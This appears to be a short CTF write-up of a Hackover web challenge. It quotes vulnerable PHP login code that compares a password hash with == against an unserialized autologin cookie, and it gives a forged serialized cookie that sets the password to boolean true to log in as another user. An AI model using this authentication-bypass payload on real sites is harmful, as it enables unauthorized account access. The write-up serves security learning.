A long time since last writeup so i have decided comment a simple web level solved on “Hackover CTF”. It’s very old vulnerability related with type safe comparation on PHP and serialize function. We have a web login with normal test users (demo, demo2) and a ‘remember login’ function that help us to keep login ‘passing data’ to autologin cookie, which have the vulnerability.  This cookie has the original format:

a:2:{s:8:"username";s:4:"demo";s:8:"password";s:32:"6388af9e3c3b76e5f053c0ff204f9228";}

As wen can see the source code of the application we start analyzing vulnerable points on do_login method, seeing what’s really compared with this piece of serialized cookie string.

function do_login($username, $pw_hash, $autologin)
{
	global $db;
	if (isset($_SESSION['user_id'])) {
		return true;
	}
	$sth = $db->prepare('SELECT id, password FROM account WHERE username = ?');
	$sth->bindValue(1, $username);
	$result = $sth->execute()->fetchArray();
	if ($result && $result['password'] == $pw_hash) { //<-- See how is compared, == instead === !!! 
		$_SESSION['user_id'] = $result['id'];
		if ($autologin) {
			setcookie('autologin', serialize(array(
				'username' => $username,
				'password' => $pw_hash
			)), time() + 60*60*24*14);
                }
		header('Location: /');
		die();
	}
	return false;
}


if (isset($_COOKIE['autologin'])) {
	$data = @unserialize($_COOKIE['autologin']);
	do_login($data['username'], $data['password'], true); // and here data unserialized. 
}

So the problem is we can set a boolean true value in serialized password data and this will produce ‘true’ comparation. Here it’s:

a:2:{s:8:"username";s:5:"Alice";s:8:"password";b:1;}

Ok. It’s all to get the flag.

ssCaptura

If you are interested on this PHP serialize vulnerability and others like that, see this pdf:
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20POC2009%20Shocking%20News%20In%20PHP%20Exploitation.pdf

 



Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *